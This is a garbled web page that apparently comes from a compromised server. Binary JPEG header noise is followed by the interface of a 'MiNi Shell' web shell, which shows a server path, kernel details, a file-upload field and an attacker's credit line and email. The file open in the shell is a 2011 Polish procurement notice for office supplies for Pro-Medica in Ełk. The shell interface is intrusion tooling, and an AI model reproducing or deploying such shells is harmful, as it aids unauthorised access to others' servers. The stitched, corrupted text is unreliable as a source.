JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110531/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110531/136002-N-2011.html

<p class="kh_header"><b>Ełk: Dostawa  artykułów biurowych na okres 12 miesięcy na potrzeby  na potrzeby Pro-Medica w Ełku Sp. z o. o.</b><br>
<b>Numer ogłoszenia: 136002 - 2011; data zamieszczenia: 31.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> "Pro-Medica" w Ełku Sp. z o.o. , ul. Baranki 24, 19-300 Ełk, woj. warmińsko-mazurskie, tel. 087 621 96 50, faks 087 621 96 33.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.promedica.elk.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Pro-Medica w Ełku Sp. z o.o..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa  artykułów biurowych na okres 12 miesięcy na potrzeby  na potrzeby Pro-Medica w Ełku Sp. z o. o..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ANTYRAMA A4	 SZT	160	50	105
 BLOCZEK SAMOPRZYLEPNY 51 X 38	 SZT	490	290	200
 BLOCZEK SAMOPRZYLEPNY 51 X 76	 SZT	380	80	200
 BLOK LISTOWY A4	 SZT	190		50
 BLOK LISTOWY A5	 SZT	150		50
 BLOK TECHNICZNY A3 KOLOROWY	 SZT	2	2	2
 BLOK TECHNICZNY A4	 SZT	20	6	10
 BLOK TECHNICZNY A4 KOLOROWY	 SZT	2	2	2
 CIENKOPIS CZARNY ZMYWALNY	 SZT	24	36	30
 CIENKOPIS PERMANENTNY	 SZT	700	300	400
 DATOWNIK AUTOMATYCZNY	 SZT	26	21	20
 DŁUGOPISY	 SZT	830	690	500
 DŁUGOPISY ŻELOWE	 SZT	370	70	220
 DYPLOMY OZDOBNE 160-180g	 SZT	100	100	100
 DZIENNIK KORESPONDENCYJNY A4	 SZT	25	15	20
 DZIURKACZE	 SZT	16	5	15
 FOLIA DO KSEROWANIA NA RZUTNIK A4	 OP	3	1	2
 FOLIA DO LAMINOWANIA 303x426 A3/100SZT	 OP	3		1
 FOLIA PRZEŹROCZYSTA A-4 DO BIND	 OP	2		2
 FOLIA STRETCH	 SZT	10		5
 FOLIOPIS	 SZT	460	228	350
 GĄBKA DO TABLICY SUCHOŚCIERALNEJ	 SZT	36		18
 GRZBIET DRUTOWY 11mm	 SZT	300		150
 GRZBIET DRUTOWY 12,7mm	 SZT	360		180
 GRZBIET DRUTOWY 14,2mm	 SZT	360		180
 GRZBIET DRUTOWY 4,8mm	 SZT	360		180
 GRZBIET DRUTOWY 6,4mm	 SZT	360		180
 GRZBIET DRUTOWY 8mm	 SZT	360	100	230
 GRZBIET DRUTOWY 9,5mm	 SZT	360		180
 GUMKA	 SZT	80	30	40
 IDENTYFIKATOR 9 CM X 5,5 CM	 SZT	50	250	250
 IDENTYFIKATOR WIELORAZOWY 105X75 	 OP	2		1
 KALKA MASZYNOWA A4	 SZT	4		10
 KALKA OŁÓWKOWA A4	 SZT	19		10
 KALKULATOR TYP CASIO GX- 12V LUB RÓWNOWAŻNY	 SZT	11	11	20
 KARTECZKI SAMOPRZYLEPNE- ZAKŁADKI INDEKSUJĄCE KOLOROWE /5	OP	10		30
 KARTECZKI W POJEMNIKACH KOLOROWE	 SZT	60	30	60
 KARTKI -WKŁADY UZUPEŁNIAJĄCE DO POJEMNIKÓW	 SZT	200	101	150
 KLEJ BIUROWY W TUBCE	 SZT	75	75	150
 KLEJ W PŁYNIE	 SZT	114	29	100
 KLEJ W SZTYFCIE	 SZT	210	90	200
 KOPERTA BIAŁA SK 160x220	 SZT	3700	2700	4000
 KOPERTY BIAŁE DO LISTÓW SK	 SZT	20000	8000	14000
 KOPERTY BIAŁE NK 160x220	 SZT	400	1400	1500
 KOPERTY BIAŁE NK 320x227	 SZT	300	250	300
 KOPERTY BIAŁE NK DO LISTÓW	 SZT	1600		800
 KOPERTY BIAŁE SK A4	 SZT	2600	750	4000
 KOPERTY DL SK BEZ OKIENKA	 SZT	1000	6000	6000
 KOPERTY DO CD/DVD TRANSPORTOWE, BĄBELKOWE	 SZT	100		50
 KOPERTY DO DYSKIETEK TRANSPOTROWE, BĄBELKOWE	 SZT	200		100
 KOPERTY SZARE NK 190x270	 SZT	34500	8500	21500
 KOPERTY SZARE NK 225x320	 SZT	30000	4500	15000
 KOPERTY SZARE NK 250x175	 SZT	4300	11300	25000
 KOPERTY SZARE NK 250x310	 SZT	250	3750	2000
 KOPERTY SZARE NK 310x410	 SZT	100		100
 KOPERTY SZARE NK 40X50	 SZT	50		100
 KOPERTY TRANSPORTOWE Z WYPEŁNIENIEM A 3	SZT			100
 KOPERTY TRANSPORTOWE Z WYPEŁNIENIEM A4	 SZT	200	200	200
 KOPERTY TRANSPORTOWE Z WYPEŁNIENIEM A5	 SZT	70	210	250
 KOREKTOR W PIÓRZE	 SZT	188	98	150
 KOREKTOR W TAŚMIE	 SZT	20	14	17
 KOSZULKI A4 /GRUBA FOLIA/ 10SZT	 OP	38	3	20
 KREDKI OŁÓWKOWE 6-o KOLOROWE	 OP	11	2	5
 LINIJKA 20CM PLAST	 SZT	32		16
 LINIJKA 30CM PLAST	 SZT	21		10
 MAGNESY DO TABLICY 1 OP=10SZT	 OP	18	18	25
 MARKER CD	 SZT	145		25
 MARKER DO PISANIA NA RĘKAWACH FOLIOWYCH	 SZT	85	30	50
 MARKER DO TABLICY SUCHOŚCIERALNEJ	 SZT	60		30
 MARKER PERMANENTNY	 SZT	260	260	260
 MARKER PISZĄCY PO SZKLE	 SZT	180	50	50
 MAZAKI /SZT /	 SZT	1300	630	900
 NOŻYCZKI BIUROWE	 SZT	12	12	20
 NOŻYKI Z WYSUWANYM OSTRZEM	 SZT	10		5
 NÓŻ DO KOPERT- PAPIERU	 SZT	5		4
 NUMERATOR Automatyczny obudowa metalowa	 SZT	5	1	6
 OBWOLUTA A4 / KOSZULKA/ 100SZT	 OP	350	180	265
 OBWOLUTA A5 /KOSZULKA/ 100SZT	 OP	22		11
 OKŁADKA DO BINDOWANIA TWARDA FORMAT A4, C-BIND NIEBIESKA	K SZT	30		15
 OKŁADKA DO BINDOWANIA TWARDA FORMAT A4, C-BIND NIEBIESKA	K SZT	40		20
 OKŁADKA KARTONOWA NIEBIESKA, EXCLUSIVE, BŁYSZCZĄCA A4	 SZT	300		150
 OKŁADKA MIĘKKA A4 C-BIND KANAŁ 300 KARTEK	 SZT	30		15
 OKŁADKA PRZEZROCZYSTA A4 DO BINDOWANIA / 100 szt	 OP	5		3
 OŁÓWKI	 SZT	140	40	90
 PAPIER - ETYKIETY SAMOPRZYLEPNE A4 / 100 szt	 OP	2		1
 PAPIER KARTON OFFSETOWY A4/170gr BIAŁY 1 ryza = 250 szt	 SZT	6000		12
 PAPIER KOLOR KSEROGRAFICZNY A4 (niebieski jasny) / 500 sz	RYZA	4	4	4
 PAPIER KOLOR KSEROGRAFICZNY A4 (pomarańczowy) / 500 szt	 RYZA	4	4	4
 PAPIER KOLOR KSEROGRAFICZNY A4 (zielony) / 500 szt	 RYZA	4	4	4
 PAPIER KSERO BIAŁY A4 160gr / 250 szt	 OP	20	24	25
 PAPIER KSERO BIAŁY A4 250gr / 250 szt	 OP	10	21	25
 PAPIER PAKOWY	 ARK	50	10	30
 PAPIER SAMOKOPIUJĄCY BIAŁY A4 / 100 szt 60 gram	 OP	700	600	700
 PAPIER XERO A3	 RYZA	900	545	800
 PAPIER XERO A4	 RYZA	3000	1770	2500
 PINEZKI 1op= 10szt	 OP	52	40	46
 PODUSZKA METALOWA DO STEMPLI	 SZT	2		5
 POJEMNIK SPINACZE -MAGNETYCZNY	 SZT	27	20	20
 POJEMNIK STOJĄCY DO ARCHIWIZACJI A4 Z KARTONU	 SZT	106	35	70
 POJEMNIK STOJĄCY NA DOKUMENTY A4 /TACKA/	 SZT	90	120	50
 PRZEKŁADKI DO SEGREGATORA 10 POZYCJI	 SZT	43		40
 PRZEKŁADKI DO SEGREGATORA 6 POZYCJI	 SZT	8		4
 PRZYBORNIK	 SZT	31	28	30
 PUDŁA ARCHIWALNE 11x36x25	 SZT	1340		1500
 ROLKA DO MASZYNY CITIZEN 355 DP III 5,5cm	 SZT	100	35	50
 ROZSZYWACZ	 SZT	33	24	25
 SEGREGATORY A-4 SZEROKIE	 SZT	490	210	350
 SEGREGATORY A-4 WĄSKIE	 SZT	520	30	275
 SEGREGATORY A-5 SZEROKIE	 SZT	90	60	75
 SKŁADANKA KOMPUTEROWA (1) 240x12	 SZT	10	6	8
 SKŁADANKA KOMPUTEROWA (1+1) 240x12 BEZ NADRUKU	 SZT	20	9	10
 SKŁADANKA KOMPUTEROWA (1+2) 240X12 BEZ NADRUKU	 SZT	28	3	5
 SKOROSZYT A-4 2-U STRONNIE ZAPINANY	 SZT	160	50	105
 SKOROSZYT A-4 PCV Z ZAWIESZKĄ METALOWĄ	 SZT	85	85	150
 SKOROSZYT A-4 TEKTUROWY	 SZT	440	30	100
 SKOROSZYT A-4 WPINANY DO SEGREGATORA- TEKTUROWY	 SZT	170	20	95
 SKOROSZYT PCV Z ZAWIESZKĄ PLASTIKOWĄ	 SZT	55	115	150
 SPINACZE 25mm	 OP	160	170	200
 SPINACZE 40mm KRZYŻAKI	 OP	65		20
 SPINACZE 50mm PROSTE	 OP	10	20	20
 SPINACZE 65mm KRZYŻAKI	 OP	155		50
 TABLICA KORKOWA 40x80	 SZT	6	6	10
 TABLICA KORKOWA 60x90	 SZT	12	1	10
 TAŚMA BARWIĄCA CZARNO-CZERW DO CITIZEN 355 DP III	 SZT	10	10	20
 TAŚMA DO FAXU PANASONIC KX-FP34321	 SZT	8		4
 TAŚMA DO MASZYNY OPTIMA SP 20	 SZT	5		2
 TAŚMA DO METKOWNICY 26x16 op=5 Rolek	 OP	18	8	13
 TAŚMA DWUSTRONNA	 SZT	52		26
 TAŚMA PAPIEROWA SAMOPRZYLEPNA 4cm	 SZT	25	24	24
 TAŚMA SAMOPRZYLEPNA 15x40	 SZT	70		35
 TAŚMA SAMOPRZYLEPNA 19x33	 SZT	110		55
 TAŚMA SAMOPRZYLEPNA 48x50	 SZT	290	170	230
 TAŚMA SAMOPRZYLEPNA DWUSTRONNA /GĄBKA/	 SZT	26		13
 TECZKA CLIPBOARD PODWÓJNY	 SZT	200	65	100
 TECZKA CLIPBOARD POJEDYŃCZY	 SZT	25		10
 TECZKA OFERTOWA	 SZT	30		15
 TECZKA PCV A-4 NA KLIPS	 SZT	190		95
 TECZKA PCV A-4 WIĄZANA	 SZT	150		75
 TECZKA PODAWCZA	 SZT	4		2
 TECZKA PRESZPANOWA NA RZEP	 SZT	85	70	80
 TECZKA TEKTUROWA A-4 NA GUMKĘ	 SZT	1320	1020	1170
 TECZKA TEKTUROWA A-4 WIĄZANA	 SZT	310	310	310
 TEMPERÓWKI	 SZT	25		20
 TUSZ DO NUMERATORÓW AUTOMATYCZNYCH O POJ 5ML	 SZT	50	10	50
 TUSZ DO STEMPLI - CZARNY	 SZT	190	40	50
 TUSZ DO STEMPLI - CZERWONY	 SZT	10	10	10
 TUSZ DO STEMPLI - FIOLETOWY	 SZT	10		5
 TUSZ DO STEMPLI - NIEBIESKI	 SZT	25		10
 WKŁADY DO DŁUGOPISÓW	 SZT	1500	460	1000
 WKŁADY ŻELOWE DO DŁUGOPISÓW	 SZT	220	20	120
 ZAKREŚLACZ	 SZT	510	360	450
 ZESZYT 16K A-5	 SZT	55		30
 ZESZYT 32K A5	 SZT	90		45
 ZESZYT 60K A5	 SZT	70	70	70
 ZESZYT 80K A5	 SZT	90		45
 ZESZYT 96K A4 MIĘKKA OPRAWA	 SZT	30	20	25
 ZESZYT 96K A4 TWARDA OPRAWA	 SZT	100	20	60
 ZESZYT 96K A5 TWARDA OPRAWA	 SZT	65		50
 ZSZYWACZ Do 20 kartek	 SZT	50	51	50
 ZSZYWKI 23/8 OP=1000SZT	 OP	28	10	19
 ZSZYWKI 24/6 OP=1000SZT	 OP	700	300	500
 ZSZYWKI 9/14 OP=1000SZT	 OP	25	5	15
 ZSZYWKI MODEL 10 OP=1000SZT	 OP	45	55	50
 ZSZYWKI RAPID 44/8 OP=5000SZT	 OP	10		5.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.10.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 2.000,00  zł słownie: dwa tysiące  zł 00/100</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczególnych warunków  w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek ten został spełniony jeżeli Wykonawca wykonał w okresie  3 lat przed dniem wszczęcia postępowania lub wykonuje nadal przynajmniej 1 zamówienie odpowiadające rodzajem  ( tj. dostawa artykułów biurowych )  i wartością dostawie stanowiącej przedmiot zamówienia tj.  na kwotę nie mniejszą niż 50.000,00 zł  ; ( słownie: pięćdziesiąt   tysięcy zł 00/100 ) , z podaniem jej wartości, przedmiotu, dat wykonania i odbiorcy, oraz załączenia dokumentów potwierdzających, że ta dostawa  została wykonana należycie;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczególnych warunków  w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczególnych warunków  w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczególnych warunków  w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie, w którym Wykonawca potwierdza, że jest związany ofertą przez okres 30 dni od dnia, w którym upływa termin składania ofert.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.promedica.elk.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Pro-Medica w Ełku Sp. z o. o.;ul. Baranki 24; 19-300 Ełk ; pokój  0/27A ; 
 - 1 piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.06.2011 godzina 10:00, miejsce: Pro-Medica  w Ełku Sp. z o. o.;ul. Baranki 24; 19-300 Ełk ;Sekretariat pokój 504; V piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com